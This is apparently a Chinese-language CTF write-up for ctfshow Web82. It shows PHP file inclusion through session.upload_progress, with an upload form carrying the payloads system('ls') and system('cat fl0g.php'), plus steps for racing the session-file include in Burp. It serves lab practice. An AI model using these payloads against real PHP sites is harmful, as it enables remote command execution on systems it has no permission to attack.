文件包涵条件竞争(ctfshow82)

小春学渗透2024-07-30 23:28

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
unable code6 小时前
攻防世界-Misc-Wire1
网络安全·ctf·misc·1024程序员节
一岁天才饺子12 小时前
SSRF漏洞绕过与漏洞解决
网络·网络安全·ssrf
Chengbei1112 小时前
fastjson 原生反序列化配合动态代理绕过限制
java·安全·网络安全·系统安全·安全架构
m0_4660499713 小时前
Webgoat-(A1)Broken Access Control:Hijack a session
web安全·网络安全
Chengbei1114 小时前
CVE-2025-24813 Tomcat 最新 RCE 分析复现
java·安全·web安全·网络安全·tomcat·系统安全·网络攻击模型
QZ1665609515915 小时前
2025年国内精细化、可交互、轻量级的泛监测体系产品推荐
网络安全
GoldY丶15 小时前
【Geek渗透之路】小迪安全笔记——web安全(3)
笔记·安全·web安全·网络安全·安全威胁分析
晚风(●•σ )17 小时前
【华为 ICT & HCIA & eNSP 习题汇总】——题目集27
网络·计算机网络·网络安全·华为
unable code1 天前
攻防世界-Misc-Miscellaneous-200
网络安全·ctf·misc
unable code1 天前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05Labelme从安装到标注:零基础完整指南06BongoCat - 跨平台键盘猫动画工具07jdk21下载、安装(Windows、Linux、macOS)08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09CentOS的ISO镜像下载10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南